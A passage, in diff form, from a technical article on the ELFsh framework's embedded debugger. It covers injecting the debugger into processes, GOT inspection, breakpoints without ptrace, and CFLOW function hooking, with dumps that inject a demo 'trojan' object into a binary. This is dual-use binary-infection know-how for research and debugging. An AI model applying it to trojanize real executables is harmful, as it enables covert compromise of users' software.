+	 (e2dbg) framework is the ELFsh scripting language. We augmented 
+	 it with loop and conditional control flow, transparent support 
+	 for lazy typed variables (like perl). The source command (for 
+	 executing a script inside the current session) and user-defined 
+	 macros (scriptdir command) are also supported.
+	 
+	 We also developed a peer2peer stack so called Distributed 
+	 Update Management Protocol - DUMP - that allow for linking 
+	 multiple debugger instances using the network, but this 
+	 capability is not covered by the article. For completeness, we
+	 now support multiusers (parallel or shared) sessions and 
+	 environment swapping using the workspace command.
+
+	 We will go through the use of such interface in the first part 
+	 of the paper. In the second part, we give technical details 
+	 about the implementation of such features on multiple 
+	 architectures. The last part is dedicated to the most recent 
+	 and advanced techniques we developed in the last weeks for
+	 constrained debugging in protected binaries. The last algorithms
+	 of the paper are architecture independant and constitute the
+	 core of the relocation engine in ELFsh.
+	 
+
+
+-------[ II. The embedded debugging playground
+     
+
+
+---[ A. In-process injection
+
+
+     
+	We have different techniques for injecting the debugger
+	inside the debuggee process. Thus it will share the address
+	space and the debugger will be able to read its own data 
+	and code for getting (and changing) information in the 
+	debuggee process.
+
+	Because the ELF shell is composed of 40000 lines of code, 
+	we did not want to recode everything for allowing process
+	modification. We used some trick that allow us to select
+	wether the modifications are done in memory or on disk. The
+	trick consists in 10 lines of code. Considering the PROFILE
+	macros not beeing mandatory, here is the exact stuff :
+
+
+ (libelfsh/section.c)
+
+
+ ========= BEGIN DUMP 0 =========
+
+ void                    *elfsh_get_raw(elfshsect_t *sect)
+ {
+   ELFSH_PROFILE_IN(__FILE__, __FUNCTION__, __LINE__);
+
+   /* sect->parent->base is always NULL for ET_EXEC */
+   if (elfsh_is_debug_mode())
+     {
+       sect->pdata = (void *) sect->parent->base + sect->shdr->sh_addr;
+      ELFSH_PROFILE_ROUT(__FILE__, __FUNCTION__, __LINE__, (sect->pdata));
+     }
+   if (sect)
+     ELFSH_PROFILE_ROUT(__FILE__, __FUNCTION__, __LINE__, (sect->data));
+
+   ELFSH_PROFILE_ERR(__FILE__, __FUNCTION__, __LINE__, 
+					"Invalid parameter", NULL);
+ }
+
+ ========= END DUMP 0 =========
+
+
+	What is the technique about ? It is quite simple : if the debugger
+	internal flag is set to static mode (on-disk modification), then we
+	return the pointer on the ELFsh internal data cache for the section 
+	data we want to access. 
+
+	However if we are in dynamic mode (process modification), then we 
+	just return the address of that section. The debugger runs in the 
+	same process and thus will think that the returned address is a 
+	readable (or writable) buffer. We can reuse all the ELF shell
+	API by just taking care of using the elfsh_get_raw() function when
+	accessing the ->data pointer. The process/ondisk selection is then
+	transparent for all the debugger/elfsh code.
+
+	The idea of injecting code directly inside the process is not
+	new and we studied it for some years now. Embedded code injection
+	is also used in the Windows cracking community [12] for bypassing 
+	most of the protections against tracing and debugging, but nowhere
+	else we have seen an implementation of a full debugger, capable
+	of such advanced features like ET_REL injection or function
+	redirection on multiple architectures, both on disk and in memory, 
+	with a single code.
+
+
+
+---[ B. Alternate ondisk and memory ELF scripting (feat. linkmap)
+
+
+
+	We have 2 approaches for inserting the debugger inside the debuggee
+	program. When using a DT_NEEDED entry and redirecting the main 
+	debuggee function onto the main entry point of the ET_DYN debugger,
+	we also inject various sections so that we can perform core 
+	techniques such as EXTPLT. That will be described in details in 
+	the next part. 
+
+	The second approach is about using LD_PRELOAD on the debuggee 
+	program and putting breakpoints (either by 0xCC opcode on x86 or 
+        the equivalent opcode on another architecture, or by function 
+        redirection which is available on many architectures and for many
+        kind of functions in the framework).
+
+	Since binary modification is needed anyway, we are using the 
+	DT_NEEDED technique for adding the library dependance, and all 
+	other sections injections or redirection described in this article,
+	before starting the real debugging.
+
+	The LD_PRELOAD technique is particulary more useful when you 
+        cannot read the binary you want to debug. It is left to the user
+        the choice of debugger injection technique, depending on the needs
+        of the moment.
+
+	Let's see how to use the embedded debugger and its 'mode' command
+	that does the memory/disk selection. Then we print the Global 
+	Offset Table (.got). First the memory GOT is displayed, then we 
+	get back in static mode and the ondisk GOT is printed :
+
+
+ ========= BEGIN DUMP 1 =========
+
+ (e2dbg-0.65) list
+
+ .::. Working files .::.
+ [001] Sun Jul 31 19:23:33 2005  D ID: 9 /lib/libncurses.so.5
+ [002] Sun Jul 31 19:23:33 2005  D ID: 8 /lib/libdl.so.2
+ [003] Sun Jul 31 19:23:33 2005  D ID: 7 /lib/libtermcap.so.2
+ [004] Sun Jul 31 19:23:33 2005  D ID: 6 /lib/libreadline.so.5
+ [005] Sun Jul 31 19:23:33 2005  D ID: 5 /lib/libelfsh.so
+ [006] Sun Jul 31 19:23:33 2005  D ID: 4 /lib/ld-linux.so.2
+ [007] Sun Jul 31 19:23:33 2005  D ID: 3 ./ibc.so.6    # e2dbg.so renamed
+ [008] Sun Jul 31 19:23:33 2005  D ID: 2 /lib/tls/libc.so.6
+ [009] Sun Jul 31 19:23:33 2005 *D ID: 1 ./a.out_e2dbg # debuggee
+
+ .::. ELFsh modules .::.
+ [*] No loaded module
+
+ (e2dbg-0.65) mode
+
+ [*] e2dbg is in DYNAMIC MODE
+
+ (e2dbg-0.65) got
+
+ [Global Offset Table .::. GOT : .got ]
+ [Object ./a.out_e2dbg]
+
+ 0x080498E4: [0] 0x00000000       <?>
+
+ [Global Offset Table .::. GOT : .got.plt ]
+ [Object ./a.out_e2dbg]
+
+ 0x080498E8: [0] 0x0804981C       <_DYNAMIC@a.out_e2dbg>
+ 0x080498EC: [1] 0x00000000       <?>
+ 0x080498F0: [2] 0x00000000       <?>
+ 0x080498F4: [3] 0x0804839E       <fflush@a.out_e2dbg>
+ 0x080498F8: [4] 0x080483AE       <puts@a.out_e2dbg>
+ 0x080498FC: [5] 0x080483BE       <malloc@a.out_e2dbg>
+ 0x08049900: [6] 0x080483CE       <strlen@a.out_e2dbg>
+ 0x08049904: [7] 0x080483DE       <__libc_start_main@a.out_e2dbg>
+ 0x08049908: [8] 0x080483EE       <printf@a.out_e2dbg>
+ 0x0804990C: [9] 0x080483FE       <free@a.out_e2dbg>
+ 0x08049910: [10] 0x0804840E      <read@a.out_e2dbg>
+
+ [Global Offset Table .::. GOT : .elfsh.altgot ]
+ [Object ./a.out_e2dbg]
+
+ 0x08049928: [0] 0x0804981C      <_DYNAMIC@a.out_e2dbg>
+ 0x0804992C: [1] 0xB7F4A4E8      <_r_debug@ld-linux.so.2 + 24>
+ 0x08049930: [2] 0xB7F3EEC0      <_dl_rtld_di_serinfo@ld-linux.so.2 + 477>
+ 0x08049934: [3] 0x0804839E      <fflush@a.out_e2dbg>
+ 0x08049938: [4] 0x080483AE      <puts@a.out_e2dbg>
+ 0x0804993C: [5] 0xB7E515F0      <__libc_malloc@libc.so.6>
+ 0x08049940: [6] 0x080483CE      <strlen@a.out_e2dbg>
+ 0x08049944: [7] 0xB7E01E50      <__libc_start_main@libc.so.6>
+ 0x08049948: [8] 0x080483EE      <printf@a.out_e2dbg>
+ 0x0804994C: [9] 0x080483FE      <free@a.out_e2dbg>
+ 0x08049950: [10] 0x0804840E     <read@a.out_e2dbg>
+ 0x08049954: [11] 0xB7DAFFF6     <e2dbg_run@ibc.so.6>
+
+ (e2dbg-0.65) mode static
+
+ [*] e2dbg is now in STATIC mode
+
+ (e2dbg-0.65) # Here we switched in ondisk perspective
+ (e2dbg-0.65) got
+
+ [Global Offset Table .::. GOT : .got ]
+ [Object ./a.out_e2dbg]
+
+ 0x080498E4: [0] 0x00000000       <?>
+
+ [Global Offset Table .::. GOT : .got.plt ]
+ [Object ./a.out_e2dbg]
+
+ 0x080498E8: [0] 0x0804981C       <_DYNAMIC>
+ 0x080498EC: [1] 0x00000000       <?>
+ 0x080498F0: [2] 0x00000000       <?>
+ 0x080498F4: [3] 0x0804839E       <fflush>
+ 0x080498F8: [4] 0x080483AE       <puts>
+ 0x080498FC: [5] 0x080483BE       <malloc>
+ 0x08049900: [6] 0x080483CE       <strlen>
+ 0x08049904: [7] 0x080483DE       <__libc_start_main>
+ 0x08049908: [8] 0x080483EE       <printf>
+ 0x0804990C: [9] 0x080483FE       <free>
+ 0x08049910: [10] 0x0804840E      <read>
+
+ [Global Offset Table .::. GOT : .elfsh.altgot ]
+ [Object ./a.out_e2dbg]
+
+ 0x08049928: [0] 0x0804981C       <_DYNAMIC>
+ 0x0804992C: [1] 0x00000000       <?>
+ 0x08049930: [2] 0x00000000       <?>
+ 0x08049934: [3] 0x0804839E       <fflush>
+ 0x08049938: [4] 0x080483AE       <puts>
+ 0x0804993C: [5] 0x080483BE       <malloc>
+ 0x08049940: [6] 0x080483CE       <strlen>
+ 0x08049944: [7] 0x080483DE       <__libc_start_main>
+ 0x08049948: [8] 0x080483EE       <printf>
+ 0x0804994C: [9] 0x080483FE       <free>
+ 0x08049950: [10] 0x0804840E      <read>
+ 0x08049954: [11] 0x0804614A      <e2dbg_run + 6>
+
+ =========  END DUMP 1 =========
+
+
+	   There are many things to notice in this dump. First you can 
+	   verify that it actually does what it is supposed to by 
+	   looking the first GOT entries which are reserved for the 
+	   linkmap and the rtld dl-resolve function. Those entries are 
+	   filled at runtime, so the static GOT version contains NULL 
+	   pointers for them. However the GOT which stands in memory has
+	   them filled. 
+
+	   Also, the new version of the GNU linker does insert multiple
+	   GOT sections inside ELF binaries. The .got section handles
+	   the pointer for external variables, while .got.plt handles 
+	   the external function pointers. In earlier versions of LD, 
+	   those 2 sections were merged. We support both conventions.
+
+	   Finally, you can see in last the .elfsh.altgot section.
+	   That is part of the ALTGOT technique and it will be 
+	   explained as a standalone algorithm in the next parts
+	   of this paper. The ALTGOT technique allow for a size
+	   extension of the Global Offset Table. It allows different
+	   things depending on the architecture. On x86, ALTGOT is
+	   only used when EXTPLT is used, so that we can add extra 
+	   function to the host file. On MIPS and ALPHA, ALTGOT
+	   allows to redirect an extern (PLT) function without losing
+	   the real function address. We will develop both of these
+	   techniques in the next parts.
+
+
+
+---[ C. Real debugging : dumping, backtrace, breakpoints
+
+
+          When performing debugging using a debugger embedded in the 
+	  debuggee process, we do not need ptrace so we cannot 
+	  modify so easily the process address space. That's why 
+	  we have to do small static changes : we add the debugger
+	  as a DT_NEEDED dependancy. The debugger will also overload some 
+	  signal handlers (SIGTRAP, SIGINT, SIGSEGV ..) so that it 
+	  can takes control on those events. 
+
+	  We can redirect functions as well using either the CFLOW or 
+	  ALTPLT technique using on-disk modification, so that we takes 
+	  control at the desired moment. Obviously we can also set 
+	  breakpoints in runtime but that need to mprotect the code zone 
+	  if it was not writable for the moment. We have idea about how
+	  to get rid of mprotect but this was not implemented in that
+	  version (0.65). Indeed, many uses of the mprotect system call
+	  are incompatible with one of the PaX option). Fortunately
+	  we assume for now that we have read access to the debuggee
+	  program, which means that we can copy the file and disable
+	  that option.
+
+	  This is how the DT_NEEDED dependence is added :
+
+
+ ========= BEGIN DUMP 2 =========
+
+ elfsh@WTH $ cat inject_e2dbg.esh
+ #!../../vm/elfsh
+ load a.out
+ set 1.dynamic[08].val 0x2
+ set 1.dynamic[08].tag DT_NEEDED
+ redir main e2dbg_run
+ save a.out_e2dbg
+
+ =========  END DUMP 2 =========
+
+
+	   Let's see the modified binary .dynamic section, where the
+	   extra DT_NEEDED entries were added using the DT_DEBUG
+	   technique that we published 2 years ago [0] :
+
+
+ ========= BEGIN DUMP 3 =========
+
+ elfsh@WTH $ ../../vm/elfsh -f ./a.out -d DT_NEEDED
+
+ [*] Object ./a.out has been loaded (O_RDONLY)
+
+ [SHT_DYNAMIC]
+ [Object ./a.out]
+
+ [00] Name of needed library => libc.so.6 {DT_NEEDED}
+
+ [*] Object ./a.out unloaded
+
+ elfsh@WTH $ ../../vm/elfsh -f ./a.out_e2dbg -d DT_NEEDED
+
+ [*] Object ./a.out_e2dbg has been loaded (O_RDONLY)
+
+ [SHT_DYNAMIC]
+ [Object ./a.out_e2dbg]
+
+ [00] Name of needed library => libc.so.6 {DT_NEEDED}
+ [08] Name of needed library => ibc.so.6 {DT_NEEDED}
+
+ [*] Object ./a.out_e2dbg unloaded
+
+ =========  END DUMP 3 =========
+
+
+     Let's see how we redirected the main function to the hook_main 
+     function. You can notice the overwritten bytes between the 2 jmp 
+     of the hook_main function. This technique is also available MIPS 
+     architecture, but this dump is from the IA32 implementation :
+
+
+ ========= BEGIN DUMP 4 =========
+
+ elfsh@WTH $ ../../vm/elfsh -f ./a.out_e2dbg -D main%40
+
+ [*] Object ./a.out_e2dbg has been loaded (O_RDONLY)
+
+ 08045134 [foff: 308] hook_main + 0  jmp   <e2dbg_run>
+ 08045139 [foff: 313] hook_main + 5  push  %ebp
+ 0804513A [foff: 314] hook_main + 6  mov   %esp,%ebp
+ 0804513C [foff: 316] hook_main + 8  push  %esi
+ 0804513D [foff: 317] hook_main + 9  push  %ebx
+ 0804513E [foff: 318] hook_main + 10 jmp   <main + 5>
+
+ 08045139 [foff: 313] old_main + 0   push  %ebp
+ 0804513A [foff: 314] old_main + 1   mov   %esp,%ebp
+ 0804513C [foff: 316] old_main + 3   push  %esi
+ 0804513D [foff: 317] old_main + 4   push  %ebx
+ 0804513E [foff: 318] old_main + 5   jmp   <main + 5>
+
+ 08048530 [foff: 13616] main + 0     jmp   <hook_main> 
+ 08048535 [foff: 13621] main + 5     sub   $2010,%esp
+ 0804853B [foff: 13627] main + 11    mov   8(%ebp),%ebx
+ 0804853E [foff: 13630] main + 14    mov   C(%ebp),%esi
+ 08048541 [foff: 13633] main + 17    and   $FFFFFFF0,%esp
+ 08048544 [foff: 13636] main + 20    sub   $10,%esp
+ 08048547 [foff: 13639] main + 23    mov   %ebx,4(%esp,1)
+ 0804854B [foff: 13643] main + 27    mov   $<_IO_stdin_used + 43>,(%esp,1)
+ 08048552 [foff: 13650] main + 34    call  <printf>
+ 08048557 [foff: 13655] main + 39    mov   (%esi),%eax
+
+ [*] No binary pattern was specified
+
+ [*] Object ./a.out_e2dbg unloaded
+
+ =========  END DUMP 4 =========
+
+	   
+	   Let's now execute the debuggee program, in which the 
+	   debugger was injected.
+
+
+ ========= BEGIN DUMP 5 =========
+
+ elfsh@WTH $ ./a.out_e2dbg
+
+
+         The Embedded ELF Debugger 0.65 (32 bits built) .::.
+
+         .::. This software is under the General Public License V.2
+         .::. Please visit http://www.gnu.org 
+
+ [*] Sun Jul 31 17:56:52 2005 - New object ./a.out_e2dbg loaded
+ [*] Sun Jul 31 17:56:52 2005 - New object /lib/tls/libc.so.6 loaded
+ [*] Sun Jul 31 17:56:53 2005 - New object ./ibc.so.6 loaded
+ [*] Sun Jul 31 17:56:53 2005 - New object /lib/ld-linux.so.2 loaded
+ [*] Sun Jul 31 17:56:53 2005 - New object /lib/libelfsh.so loaded
+ [*] Sun Jul 31 17:56:53 2005 - New object /lib/libreadline.so.5 loaded
+ [*] Sun Jul 31 17:56:53 2005 - New object /lib/libtermcap.so.2 loaded
+ [*] Sun Jul 31 17:56:53 2005 - New object /lib/libdl.so.2 loaded
+ [*] Sun Jul 31 17:56:53 2005 - New object /lib/libncurses.so.5 loaded
+
+ (e2dbg-0.65) b puts
+
+ [*] Breakpoint added at <puts@a.out_e2dbg> (0x080483A8)
+
+ (e2dbg-0.65) continue
+
+         [..: Embedded ELF Debugger returns to the grave :...]
+
+ [e2dbg_run] returning to 0x08045139
+ [host] main argc 1
+ [host] argv[0] is : ./a.out_e2dbg
+
+ First_printf test
+
+         The Embedded ELF Debugger 0.65 (32 bits built) .::.
+
+         .::. This software is under the General Public License V.2
+         .::. Please visit http://www.gnu.org 
+
+ [*] Sun Jul 31 17:57:03 2005 - New object /lib/tls/libc.so.6 loaded
+
+ (e2dbg-0.65) bt
+
+ .:: Backtrace ::.
+ [00] 0xB7DC1EC5 <vm_bt@ibc.so.6 + 208>
+ [01] 0xB7DC207F <cmd_bt@ibc.so.6 + 152>
+ [02] 0xB7DBC88C <vm_execmd@ibc.so.6 + 174>
+ [03] 0xB7DAB4DE <vm_loop@ibc.so.6 + 578>
+ [04] 0xB7DAB943 <vm_run@ibc.so.6 + 271>
+ [05] 0xB7DA5FF0 <e2dbg_entry@ibc.so.6 + 110>
+ [06] 0xB7DA68D6 <e2dbg_genericbp_ia32@ibc.so.6 + 183>
+ [07] 0xFFFFE440 <_r_debug@ld-linux.so.2 + 1208737648>	# sigtrap retaddr
+ [08] 0xB7DF7F3B <__libc_start_main@libc.so.6 + 235>	
+ [09] 0x08048441 <_start@a.out_e2dbg + 33>
+
+ (e2dbg-0.65) b
+
+ .:: Breakpoints ::.
+
+ [00] 0x080483A8 <puts@a.out_e2dbg>
+
+ (e2dbg-0.65) delete 0x080483A8
+
+ [*] Breakpoint at 080483A8 <puts@a.out_e2dbg> removed
+
+ (e2dbg-0.65) b
+
+ .:: Breakpoints ::.
+
+ [*] No breakpoints
+
+ (e2dbg-0.65) b printf
+
+ [*] Breakpoint added at <printf@a.out_e2dbg> (0x080483E8)
+
+ (e2dbg-0.65) dumpregs
+
+ .:: Registers ::.
+
+         [EAX] 00000000 (0000000000) <unknown>
+         [EBX] 08203F48 (0136331080) <.elfsh.relplt@a.out_e2dbg + 1811272>
+         [ECX] 00000000 (0000000000) <unknown>
+         [EDX] B7F0C7C0 (3086010304) <__guard@libc.so.6 + 1656>
+         [ESI] BFE3B7C4 (3219371972) <_r_debug@ld-linux.so.2 + 133149428>
+         [EDI] BFE3B750 (3219371856) <_r_debug@ld-linux.so.2 + 133149312>
+         [ESP] BFE3970C (3219363596) <_r_debug@ld-linux.so.2 + 133141052>
+         [EBP] BFE3B738 (3219371832) <_r_debug@ld-linux.so.2 + 133149288>
+         [EIP] 080483A9 (0134513577) <puts@a.out_e2dbg>
+
+ (e2dbg-0.65) stack 20
+
+ .:: Stack ::.
+ 0xBFE37200 0x00000000 <(null)>
+ 0xBFE37204 0xB7DC2091 <vm_dumpstack@ibc.so.6>
+ 0xBFE37208 0xB7DDF5F0 <_GLOBAL_OFFSET_TABLE_@ibc.so.6>
+ 0xBFE3720C 0xBFE3723C <_r_debug@ld-linux.so.2 + 133131628>
+ 0xBFE37210 0xB7DC22E7 <cmd_stack@ibc.so.6 + 298>
+ 0xBFE37214 0x00000014 <_r_debug@ld-linux.so.2 + 1208744772>
+ 0xBFE37218 0xB7DDDD90 <__FUNCTION__.5@ibc.so.6 + 49>
+ 0xBFE3721C 0xBFE37230 <_r_debug@ld-linux.so.2 + 133131616>
+ 0xBFE37220 0xB7DB9DF9 <vm_implicit@ibc.so.6 + 304>
+ 0xBFE37224 0xB7DE1A7C <world@ibc.so.6 + 92>
+ 0xBFE37228 0xB7DA8176 <do_resolve@ibc.so.6>
+ 0xBFE3722C 0x080530B8 <.elfsh.relplt@a.out_e2dbg + 38072>
+ 0xBFE37230 0x00000014 <_r_debug@ld-linux.so.2 + 1208744772>
+ 0xBFE37234 0x08264FF6 <.elfsh.relplt@a.out_e2dbg + 2208758>
+ 0xBFE37238 0xB7DDF5F0 <_GLOBAL_OFFSET_TABLE_@ibc.so.6>
+ 0xBFE3723C 0xBFE3726C <_r_debug@ld-linux.so.2 + 133131676>
+ 0xBFE37240 0xB7DBC88C <vm_execmd@ibc.so.6 + 174>
+ 0xBFE37244 0x0804F208 <.elfsh.relplt@a.out_e2dbg + 22024>
+ 0xBFE37248 0x00000000 <(null)>
+ 0xBFE3724C 0x00000000 <(null)>
+
+ (e2dbg-0.65) continue
+
+         [..: Embedded ELF Debugger returns to the grave :...]
+
+ First_puts
+
+         The Embedded ELF Debugger 0.65 (32 bits built) .::.
+
+         .::. This software is under the General Public License V.2
+         .::. Please visit http://www.gnu.org 
+
+ [*] Sun Jul 31 18:00:47 2005 - /lib/tls/libc.so.6 loaded
+ [*] Sun Jul 31 18:00:47 2005 - /usr/lib/gconv/ISO8859-1.so loaded
+
+ (e2dbg-0.65) dumpregs
+
+ .:: Registers ::.
+
+         [EAX] 0000000B (0000000011) <_r_debug@ld-linux.so.2 + 1208744763>
+         [EBX] 08203F48 (0136331080) <.elfsh.relplt@a.out_e2dbg + 1811272>
+         [ECX] 0000000B (0000000011) <_r_debug@ld-linux.so.2 + 1208744763>
+         [EDX] B7F0C7C0 (3086010304) <__guard@libc.so.6 + 1656>
+         [ESI] BFE3B7C4 (3219371972) <_r_debug@ld-linux.so.2 + 133149428>
+         [EDI] BFE3B750 (3219371856) <_r_debug@ld-linux.so.2 + 133149312>
+         [ESP] BFE3970C (3219363596) <_r_debug@ld-linux.so.2 + 133141052>
+         [EBP] BFE3B738 (3219371832) <_r_debug@ld-linux.so.2 + 133149288>
+         [EIP] 080483E9 (0134513641) <printf@a.out_e2dbg>
+
+ (e2dbg-0.65) linkmap
+
+ .::. Linkmap entries .::.
+ [01] addr : 0x00000000 dyn : 0x0804981C -
+ [02] addr : 0x00000000 dyn : 0xFFFFE590 -
+ [03] addr : 0xB7DE3000 dyn : 0xB7F0AD3C - /lib/tls/libc.so.6
+ [04] addr : 0xB7D95000 dyn : 0xB7DDF01C - ./ibc.so.6
+ [05] addr : 0xB7F29000 dyn : 0xB7F3FF14 - /lib/ld-linux.so.2
+ [06] addr : 0xB7D62000 dyn : 0xB7D93018 - /lib/libelfsh.so
+ [07] addr : 0xB7D35000 dyn : 0xB7D5D46C - /lib/libreadline.so.5
+ [08] addr : 0xB7D31000 dyn : 0xB7D34BB4 - /lib/libtermcap.so.2
+ [09] addr : 0xB7D2D000 dyn : 0xB7D2FEEC - /lib/libdl.so.2
+ [10] addr : 0xB7CEB000 dyn : 0xB7D2A1C0 - /lib/libncurses.so.5
+ [11] addr : 0xB6D84000 dyn : 0xB6D85F28 - /usr/lib/gconv/ISO8859-1.so
+
+ (e2dbg-0.65) exit
+
+ [*] Unloading object 1 (/usr/lib/gconv/ISO8859-1.so)
+ [*] Unloading object 2 (/lib/tls/libc.so.6)
+ [*] Unloading object 3 (/lib/tls/libc.so.6)
+ [*] Unloading object 4 (/lib/libncurses.so.5)
+ [*] Unloading object 5 (/lib/libdl.so.2)
+ [*] Unloading object 6 (/lib/libtermcap.so.2)
+ [*] Unloading object 7 (/lib/libreadline.so.5)
+ [*] Unloading object 8 (/home/elfsh/WTH/elfsh/libelfsh/libelfsh.so)
+ [*] Unloading object 9 (/lib/ld-linux.so.2)
+ [*] Unloading object 10 (./ibc.so.6)
+ [*] Unloading object 11 (/lib/tls/libc.so.6)
+ [*] Unloading object 12 (./a.out_e2dbg) *
+
+         .:: Bye -:: The Embedded ELF Debugger 0.65
+
+ =========  END DUMP 5 =========
+
+
+	   As you see, the use of the debugger is quite similar to other
+	   debuggers. The difference is about the implementation technique
+	   which allows for hardened and embedded systems debugging where
+	   ptrace is not present or disabled.
+
+	   We were told [9] that the sigaction system call enables the 
+	   possibility of doing step by step execution without using
+	   ptrace. We did not have time to implement it but we will 
+	   provide a step-capable debugger in the very near future. Since 
+	   that call is not filtered by grsecurity and seems to be quite 
+	   portable on Linux, BSD, Solaris and HP-UX, it is definitely 
+	   worth testing it.
+
+
+---[ D. Dynamic analyzers generation 
+
+
+           Obviously, tools like ltrace [7] can be now done in elfsh
+	   scripts for multiple architectures since all the redirection 
+	   stuff is available.     
+
+	   We also think that the framework can be used in dynamic 
+	   software instrumentation. Since we support multiple 
+	   architectures, we let the door open to other development 
+	   team to develop such modules or extension inside the ELF 
+	   shell framework.
+
+	   We did not have time to include an example script for now that 
+	   can do this, but we will soon. The kind of interresting stuff
+	   that could be done and improved using the framework would
+	   take its inspiration in projects like fenris [6]. That could
+	   be done for multiple architectures as soon as the instruction
+	   format type is integrated in the script engine, using the code
+	   abstraction of libasm (which is now included as sources in
+	   elfsh).
+
+	   We do not deal with encryption for now, but some promising API 
+	   [5] could be implemented as well for multiple architectures 
+	   very easily.
+
+
+
+-------[ III. Better multiarchitecture ELF redirections
+
+
+	 In the first issue of the Cerberus ELF interface [0], we 
+	 presented a redirection technique that we called ALTPLT. This 
+	 technique is not enough since it allows only for PLT 
+	 redirection on existing function of the binary program so
+	 the software extension usable functions set is limited.
+
+	 Morever, we noticed a bug in the previously released 
+	 implementation of the ALTPLT technique : On the SPARC
+	 architecture, when calling the original function, the 
+	 redirection was removed and the program continued to work as if
+	 no hook was installed. This bug came from the fact that Solaris
+	 does not use the r_offset field for computing its relocation 
+	 but get the file offset by multiplying the PLT entry size by the 
+	 pushed relocation offset on the stack at the moment of dynamic 
+	 resolution. 
+
+	 We found a solution for this problem. That solution consisted in
+	 adding some architecture specific fixes at the beginning of the 
+	 ALTPLT section. However, such a fix is too much architecture
+	 dependant and we started to think about an alternative technique
+	 for implementing ALTPLT. As we had implemented the DT_DEBUG 
+	 technique by modifying some entries in the .dynamic sections, we
+	 discovered that many other entries are erasable and allow for
+	 a very strong and architecture independant technique for 
+	 redirecting access to various sections. More precisely, when 
+	 patching the DT_PLTREL entry, we are able to provide our own 
+	 pointer. DT_PLTREL is an architecture dependant entry and the  
+	 documentation about it is quite weak, not to say inexistant. 
+
+	 It actually points on the section of the executable beeing   
+	 runtime relocated (e.g. GOT on x86 or mips, PLT on sparc and 
+	 alpha). By changing this entry we are able to provide our own 
+	 PLT or GOT, which leads to possibly extending it.
+
+	 Let's first have look at the CFLOW technique and then comes
+	 back on the PLT related redirections using the DT_PLTREL
+	 modification.
+
+
+
+---[ A. CFLOW: PaX-safe static functions redirection		
+
+
+	 CFLOW is a simple but efficient technique for function 
+	 redirection that are located in the host file and not
+	 having a PLT entry.                          
+	 
+	 Let's see the host file that we use for this test: 
+	 
+
+
+ ========= BEGIN DUMP 6 =========
+
+ elfsh@WTH $ cat host.c
+ #include <stdio.h>
+ #include <stdlib.h>
+ #include <unistd.h>
+
+ int     legit_func(char *str)
+ {
+   printf("legit func (%s) !\n", str);
+   return (0);
+ }
+
+ int	main()
+ {
+   char  *str;
+   char  buff[BUFSIZ];
+
+   read(0, buff, BUFSIZ-1);
+
+   str = malloc(10);
+   if (str == NULL)
+     goto err;
+   strcpy(str, "test");
+   printf("First_printf %s\n", str);
+   fflush(stdout);
+   puts("First_puts");
+   printf("Second_printf %s\n", str);
+
+   free(str);
+
+   puts("Second_puts");
+
+   fflush(stdout);
+   legit_func("test");
+   return (0);
+  err:
+   printf("Malloc problem\n");
+   return (-1);
+ }
+
+ =========  END DUMP 6 =========
+
+
+	   We will here redirect the function legit_func, which is located
+	   inside host.c by the hook_func function located in the 
+	   relocatable object.
+
+	   Let's look at the relocatable file that we are going to inject
+	   in the above binary.
+
+
+ ========= BEGIN DUMP 7 =========
+
+ elfsh@WTH $ cat rel.c
+ #include <stdio.h>
+ #include <stdlib.h>
+ #include <unistd.h>
+
+ int     glvar_testreloc = 42;
+ int     glvar_testreloc_bss;
+ char    glvar_testreloc_bss2;
+ short   glvar_testreloc_bss3;
+
+ int     hook_func(char *str)
+ {
+    printf("HOOK FUNC %s !\n", str);
+    return (old_legit_func(str));
+ }
+
+ int     puts_troj(char *str)
+ {
+   int   local = 1;
+   char  *str2;
+
+   str2 = malloc(10);
+   *str2 = 'Z';
+   *(str2 + 1) = 0x00;
+
+   glvar_testreloc_bss  = 43;
+   glvar_testreloc_bss2 = 44;
+   glvar_testreloc_bss3 = 45;
+
+   printf("Trojan injected ET_REL takes control now "
+          "[%s:%s:%u:%u:%hhu:%hu:%u] \n",
+         str2, str,
+         glvar_testreloc,
+         glvar_testreloc_bss,
+         glvar_testreloc_bss2,
+         glvar_testreloc_bss3,
+         local);
+
+   free(str2);
+
+   putchar('e');
+   putchar('x');
+   putchar('t');
+   putchar('c');
+   putchar('a');
+   putchar('l');
+   putchar('l');
+   putchar('!');
+   putchar('\n'); 
+
+   old_puts(str); 
+
+   write(1, "calling write\n", 14);
+   fflush(stdout);
+   return (0);
+ }
+
+ int     func2()
+ {
+   return (42);
+ }
+
+ =========  END DUMP 7 =========
+
+	  
+	  As you can see, the relocatable object use of unknown functions
+     like write and putchar. Those functions do not have a symbol, plt 
+     entry, got entry, or even relocatable entry in the host file.
+	   
+     We can call it however using the EXTPLT technique that will be 
+     described as a standalone technique in the next part of this paper. 
+     For now we focuss on the CFLOW technique that allow for redirection 
+     of the legit_func on the hook_func. This function does not have a 
+     PLT entry and we cannot use simple PLT infection for this. 
+
+     We developped a technique that is PaX safe for ondisk redirection of 
+     this kind of function. It consists of putting the good old jmp
+     instruction at the beginning of the legit_func and redirect the flow
+     on our own code. ELFsh will take care of executing the overwritten
+     bytes somewhere else and gives back control to the redirected
+     function, just after the jmp hook, so that no runtime restoration is
+     needed and it stays PaX safe on disk.
+
+     When these techniques are used in the debugger directly in memory
+     and not on disk, they all break the mprotect protection of PaX, 
+     which means that this flag must be disabled if you want to redirect
+     the flow directly into memory. We use use the mprotect syscall on
+     small code zone for beeing able to changes some specific instructions
+     for redirection. However, we think that this technique is mostly
+     interresting for debugging and not for other things, so it is not
+     our priority to improve this for now.
+	   
+     Let's see the small ELFsh script for this example :
+
+
+ ========= BEGIN DUMP 8 =========
+
+ elfsh@WTH $ file a.out
+ a.out: ELF 32-bit LSB executable, Intel 80386, dynamically linked, \
+ not stripped
+ elfsh@WTH $ cat relinject.esh
+ #!../../../vm/elfsh
+
+ load a.out
+ load rel.o
+
+ reladd 1 2
+
+ redir puts puts_troj
+ redir legit_func hook_func
+
+ save fake_aout
+
+ quit
+
+ =========  END  EXAMPLE 8 =========
+
+
+    The output of the ORIGINAL binary is as follow:
+
+
+ ========= BEGIN DUMP 9 =========
+
+ elfsh@WTH $ ./a.out
+
+ First_printf test
+ First_puts
+ Second_printf test
+ Second_puts
+ LEGIT FUNC
+ legit func (test) !
+
+ ========= END DUMP 9 ===========
+
+
+     Now let's inject the stuff:
+
+	   
+ ========= BEGIN DUMP 10 ========
+
+ elfsh@WTH $ ./relinject.esh
+
+
+         The ELF shell 0.65 (32 bits built) .::.
+
+         .::. This software is under the General Public License V.2
+         .::. Please visit http://www.gnu.org 
+
+ ~load a.out
+
